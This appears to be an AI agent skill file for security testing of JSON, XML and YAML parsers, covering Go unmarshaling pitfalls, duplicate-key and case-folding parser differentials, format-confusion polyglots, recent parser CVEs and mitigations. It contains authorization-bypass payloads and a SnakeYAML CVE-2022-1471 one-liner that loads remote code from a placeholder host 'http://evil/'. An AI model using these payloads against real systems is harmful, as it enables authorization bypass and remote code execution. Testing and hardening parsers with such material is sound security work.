Hacktricks-skills json-xml-yaml-hacking

Security testing skill for auditing JSON, XML, and YAML parser vulnerabilities. Use this skill whenever you need to test for deserialization attacks, parser inconsistencies, duplicate field exploits, case-insensitivity bypasses, or data format confusion attacks. Trigger this skill for any security audit involving data parsing, API input validation, authentication bypass testing, or when reviewing code that handles JSON/XML/YAML deserialization. Don't skip this skill when testing web applications, microservices, or any system that parses structured data from untrusted sources.

Install

Clone the upstream repo:

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/pentesting-web/json-xml-yaml-hacking/SKILL.MD

JSON, XML & YAML Parser Security Testing

This skill helps you identify and exploit parser vulnerabilities that can lead to authentication bypass, privilege escalation, and data exfiltration.

Quick Start

  1. Identify the target parser (Go, Java, Python, etc.)
  2. Select the attack vector based on the parser's known weaknesses
  3. Craft the payload using the patterns below
  4. Test and observe how the parser handles the input

Attack Vectors

1. (Un)Marshaling Unexpected Data

Exploit struct field handling to read/write sensitive fields.

Missing JSON tags:

type User struct {
    Username string  // No tag = still parsed
}

Payload:

{"Username": "admin"}

Incorrect "-" tag usage:

type User struct {
    IsAdmin bool `json:"-,omitempty"`  // Wrong! Should be `json:"-"`
}

Exploit payload:

{"-": true}

Test checklist:

  • Check for struct fields without JSON tags
  • Look for malformed json:"-" tags (e.g., json:"-,omitempty")
  • Attempt to set sensitive fields via JSON input
  • Verify omitempty doesn't prevent field injection
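
The two tag pitfalls above can be reproduced with a minimal sketch. The Secret field and the decodeUser helper are hypothetical additions for illustration; only Username and IsAdmin come from the snippets above.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// User combines the struct patterns from this section.
type User struct {
	Username string // no tag: still filled from "Username" in any casing
	IsAdmin  bool   `json:"-,omitempty"` // mistake: the JSON key is literally "-"
	Secret   string `json:"-"`           // hypothetical field: correctly excluded from JSON
}

// decodeUser unmarshals attacker-controlled JSON into a User.
func decodeUser(input string) (User, error) {
	var u User
	err := json.Unmarshal([]byte(input), &u)
	return u, err
}

func main() {
	u, err := decodeUser(`{"username":"admin","-":true,"Secret":"x"}`)
	fmt.Printf("%+v err=%v\n", u, err)
}
```

With this input, IsAdmin ends up true while Secret stays empty, which is the difference between the malformed and the correct tag.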

2. Parser Differentials

Exploit how different parsers interpret the same payload differently.

Duplicate fields (last-wins vs first-wins):

{"action":"UserAction", "action":"AdminAction"}
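  • Go encoding/json: takes the last value (AdminAction)
  • Some other parsers keep the first value (UserAction). Java Jackson is often cited as an example, but its duplicate handling depends on version and configuration (for instance strict duplicate detection), so confirm the behavior against the target.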
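
A minimal sketch for confirming the Go side of this differential. The Request type and parseAction helper are assumptions made for the example, not part of any target application.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Request is a hypothetical message type with a single field.
type Request struct {
	Action string `json:"action"`
}

// parseAction decodes the body and returns the action encoding/json settled on.
func parseAction(input string) (string, error) {
	var r Request
	if err := json.Unmarshal([]byte(input), &r); err != nil {
		return "", err
	}
	return r.Action, nil
}

func main() {
	// Duplicate keys are accepted silently; the later value overwrites the earlier one.
	action, err := parseAction(`{"action":"UserAction", "action":"AdminAction"}`)
	fmt.Println(action, err)
}
```

Running the same payload through each parser in the request path shows which services disagree.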

Case insensitivity (Go-specific):

{"AcTiOn":"AdminAction"}
  • Go: matches the Action field (case-insensitive)
  • Python/Java: may not match (case-sensitive)

Unicode tricks:

{"aKtionſ": "bypass"}
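  • Go matches keys using Unicode case folding, so ſ (U+017F, long s) is treated as s and K (U+212A, Kelvin sign) as k. Such keys can match an ASCII field name while slipping past byte-wise or ASCII-only comparisons.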
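
The sketch below exercises both the case-insensitive match and the Unicode folding. The Aktions field is hypothetical and was chosen only because its name contains k and s; the key is written with Go escapes so the non-ASCII code points are explicit.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Request is a hypothetical type; Aktions exists only to demonstrate folding.
type Request struct {
	Action  string `json:"action"`
	Aktions string `json:"aktions"`
}

// decode unmarshals input into a Request.
func decode(input string) (Request, error) {
	var r Request
	err := json.Unmarshal([]byte(input), &r)
	return r, err
}

func main() {
	// Mixed-case ASCII key still lands in the Action field.
	r1, err := decode(`{"AcTiOn":"AdminAction"}`)
	fmt.Printf("%+v err=%v\n", r1, err)

	// U+212A (Kelvin sign) folds to k, U+017F (long s) folds to s.
	r2, err := decode("{\"a\u212Ation\u017F\":\"bypass\"}")
	fmt.Printf("%+v err=%v\n", r2, err)
}
```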

Cross-service mismatch attack:

{
  "action": "UserAction",
  "AcTiOn": "AdminAction"
}
  • Python service sees UserAction (allows)
  • Go service sees AdminAction (executes)
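
The mismatch can be simulated in a single Go program. This is a sketch under an assumption: gatewayAllows stands in for the case-sensitive service by decoding into a map, which keeps keys byte-for-byte, while backendAction decodes into a struct the way a typical Go handler would. Both function names are hypothetical.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Request is the hypothetical struct used by the executing service.
type Request struct {
	Action string `json:"action"`
}

// gatewayAllows mimics a case-sensitive authorization check:
// only the exact key "action" is inspected.
func gatewayAllows(body []byte) (bool, error) {
	var m map[string]any
	if err := json.Unmarshal(body, &m); err != nil {
		return false, err
	}
	action, _ := m["action"].(string)
	return action == "UserAction", nil
}

// backendAction mimics the Go service that performs the action.
func backendAction(body []byte) (string, error) {
	var r Request
	err := json.Unmarshal(body, &r)
	return r.Action, err
}

func main() {
	body := []byte(`{"action":"UserAction","AcTiOn":"AdminAction"}`)
	allowed, _ := gatewayAllows(body)
	action, _ := backendAction(body)
	fmt.Printf("gateway allowed=%v, backend executes=%s\n", allowed, action)
}
```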

Test checklist:

  • Send duplicate keys and observe which value is used
  • Try case variations of field names
  • Test Unicode character substitutions
  • Map all services in the request path and their parser languages
  • Look for authorization decisions made by different services

3. Data Format Confusion (Polyglots)

Exploit systems that mix parsers or fail open on errors.

CVE-2020-16250 pattern (Vault XML/JSON confusion):

{
  "action": "Action_1",
  "AcTiOn": "Action_2",
  "ignored": "<?xml version=\"1.0\"?><Action>Action_3</Action>"
}

Expected behavior:

  • Go JSON parser: Action_2 (case-insensitive + last wins)
  • YAML parser: Action_1 (case-sensitive)
  • XML parser: Action_3, taken from the markup embedded in the string (Go's encoding/xml skips the non-XML data around the root element)
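
A reduced sketch of the JSON and XML halves of this behavior using only the Go standard library. The YAML case is left out because it needs a third-party package, the XML declaration is dropped to keep the payload simple, and the Request wrapper element is an assumption made for the example.

```go
package main

import (
	"encoding/json"
	"encoding/xml"
	"fmt"
)

// Request is a hypothetical type decoded by both parsers.
type Request struct {
	Action string `json:"action" xml:"Action"`
}

// parseBoth feeds the same bytes to encoding/json and encoding/xml
// and returns the action each parser extracted.
func parseBoth(body []byte) (jsonAction, xmlAction string, err error) {
	var j, x Request
	if err = json.Unmarshal(body, &j); err != nil {
		return "", "", err
	}
	// encoding/xml skips character data before the first start element
	// and stops reading once the root element is closed.
	if err = xml.Unmarshal(body, &x); err != nil {
		return "", "", err
	}
	return j.Action, x.Action, nil
}

func main() {
	body := []byte(`{"action":"Action_1","AcTiOn":"Action_2","ignored":"<Request><Action>Action_3</Action></Request>"}`)
	j, x, err := parseBoth(body)
	fmt.Println(j, x, err)
}
```

If a service picks the parser based on a header or falls back to a second parser on error, the same request body yields different actions.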

Test checklist:

  • Check if the Accept header can be controlled
  • Look for fallback parsers (JSON → XML, etc.)
  • Embed XML/HTML in JSON string fields
  • Test parser error handling (does it fail open?)
  • Verify content-type validation is strict

Known Vulnerabilities (2022-2025)

SnakeYAML Deserialization RCE (CVE-2022-1471)

Affects: org.yaml:snakeyaml < 2.0

One-liner PoC:

!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ]

Mitigation:

  • Upgrade to ≥2.0, where arbitrary classes are no longer instantiated from global tags by default
  • Use new Yaml(new SafeConstructor()) on older versions

libyaml Double-Free (CVE-2024-35325)

Affects: libyaml ≤0.2.5

Impact: DoS or heap exploitation via double-free

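Mitigation: Upgrade to a fixed upstream release (listed here as 0.2.6) or a distro-patched package. Check the CVE record's current status before reporting, since this finding has been disputed upstream.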

RapidJSON Integer Overflow (CVE-2024-38517 / CVE-2024-39684)

Affects: RapidJSON before commit 8269bc2 (<1.1.0-patch-22)

Impact: Heap corruption via crafted numeric literals

Mitigation: Compile against latest RapidJSON (≥July 2024)

Mitigations Reference

Risk | Fix / Recommendation
-----|---------------------
Unknown fields (JSON) | decoder.DisallowUnknownFields()
Duplicate fields (JSON) | Validate with external library (no stdlib fix)
Case-insensitive match (Go) | Pre-canonicalize input + validate struct tags
XML garbage data / XXE | Use a hardened parser with DTD processing disabled and reject data outside the root element (Go's encoding/xml has no DisallowDTD option)
YAML unknown keys | decoder.KnownFields(true) (gopkg.in/yaml.v3)
Unsafe YAML deserialization | Use SafeConstructor / upgrade SnakeYAML ≥2.0
libyaml ≤0.2.5 | Use a patched upstream or distro release
RapidJSON <patched | Compile against latest (≥July 2024)
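
The JSON rows of the table can be combined into one strict decoding path. This is a minimal sketch under stated assumptions: Request, checkTopLevelKeys, and strictDecode are hypothetical names, the allow-list is hard-coded, and only top-level keys are checked for duplicates and exact casing (nested objects would need the same walk).

```go
package main

import (
	"bytes"
	"encoding/json"
	"errors"
	"fmt"
	"io"
)

// Request is a hypothetical message type.
type Request struct {
	Action string `json:"action"`
}

// checkTopLevelKeys rejects duplicate keys and keys that do not match
// an allowed name byte-for-byte (which also blocks case and Unicode variants).
func checkTopLevelKeys(data []byte, allowed map[string]bool) error {
	dec := json.NewDecoder(bytes.NewReader(data))
	tok, err := dec.Token()
	if err != nil {
		return err
	}
	if d, ok := tok.(json.Delim); !ok || d != '{' {
		return errors.New("expected a JSON object")
	}
	seen := map[string]bool{}
	for dec.More() {
		keyTok, err := dec.Token()
		if err != nil {
			return err
		}
		key, ok := keyTok.(string)
		if !ok {
			return errors.New("expected a string key")
		}
		if !allowed[key] {
			return fmt.Errorf("unexpected key %q", key)
		}
		if seen[key] {
			return fmt.Errorf("duplicate key %q", key)
		}
		seen[key] = true
		var skip json.RawMessage // consume the value without interpreting it
		if err := dec.Decode(&skip); err != nil {
			return err
		}
	}
	return nil
}

// strictDecode validates keys first, then decodes with unknown fields
// disallowed and refuses any trailing data after the object.
func strictDecode(data []byte) (Request, error) {
	var r Request
	if err := checkTopLevelKeys(data, map[string]bool{"action": true}); err != nil {
		return r, err
	}
	dec := json.NewDecoder(bytes.NewReader(data))
	dec.DisallowUnknownFields()
	if err := dec.Decode(&r); err != nil {
		return r, err
	}
	if _, err := dec.Token(); err != io.EOF {
		return r, errors.New("trailing data after JSON value")
	}
	return r, nil
}

func main() {
	for _, in := range []string{
		`{"action":"UserAction"}`,
		`{"action":"UserAction","action":"AdminAction"}`,
		`{"action":"UserAction","AcTiOn":"AdminAction"}`,
	} {
		r, err := strictDecode([]byte(in))
		fmt.Printf("%s -> %+v err=%v\n", in, r, err)
	}
}
```

Note that DisallowUnknownFields alone does not stop the case-variant key, because that key still matches a known field; the exact-name check is what rejects it.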

Testing Workflow

Step 1: Reconnaissance

  • Identify all parsers in the request path
  • Map which service makes which authorization decision
  • Check parser versions and configurations

Step 2: Payload Crafting

  • Start with simple duplicate fields
  • Add case variations
  • Try Unicode substitutions
  • Embed alternative formats in string fields
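
The four crafting steps can be scripted. Below is a hedged sketch: craftPayloads and quote are hypothetical helpers, payloads are assembled as strings because a Go map cannot hold duplicate keys, and the Unicode variant is produced only when the field name contains k or s.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"strings"
)

// quote returns s as a JSON string literal without HTML escaping,
// so embedded markup such as <action> stays byte-for-byte intact.
func quote(s string) string {
	var buf bytes.Buffer
	enc := json.NewEncoder(&buf)
	enc.SetEscapeHTML(false)
	_ = enc.Encode(s) // encoding a plain string does not fail
	return strings.TrimSuffix(buf.String(), "\n")
}

// craftPayloads builds one payload per technique listed in Step 2.
func craftPayloads(field, benign, privileged string) []string {
	pair := func(k, v string) string { return quote(k) + ":" + quote(v) }
	payloads := []string{
		// Simple duplicate field.
		"{" + pair(field, benign) + "," + pair(field, privileged) + "}",
		// Case variation of the field name.
		"{" + pair(field, benign) + "," + pair(strings.ToUpper(field), privileged) + "}",
	}
	// Unicode substitution: Kelvin sign for k, long s for s.
	folded := strings.NewReplacer(
		"k", "\u212A", "K", "\u212A",
		"s", "\u017F", "S", "\u017F",
	).Replace(field)
	if folded != field {
		payloads = append(payloads, "{"+pair(field, benign)+","+pair(folded, privileged)+"}")
	}
	// Alternative format embedded in a string field.
	embedded := "<" + field + ">" + privileged + "</" + field + ">"
	payloads = append(payloads, "{"+pair(field, benign)+","+pair("ignored", embedded)+"}")
	return payloads
}

func main() {
	for _, p := range craftPayloads("task", "UserAction", "AdminAction") {
		fmt.Println(p)
	}
}
```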

Step 3: Execution

  • Send payloads to each service independently
  • Observe differences in behavior
  • Look for authorization bypasses

Step 4: Verification

  • Confirm the exploit works end-to-end
  • Document the exact parser differential
  • Provide remediation steps

Related CWEs

  • CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes (mass assignment via unmarshaling unexpected data)
  • CWE-502: Deserialization of Untrusted Data
  • CWE-170: Improper Null Termination (parser edge cases)

References

  • Trail of Bits: Unexpected Security Footguns in Go's Parsers
  • CVE-2017-12635: Apache CouchDB duplicate key bypass
  • CVE-2020-16250: HashiCorp Vault XML/JSON confusion
  • CVE-2022-1471: SnakeYAML deserialization RCE
  • CVE-2024-35325: libyaml double-free
  • CVE-2024-38517 / CVE-2024-39684: RapidJSON integer overflow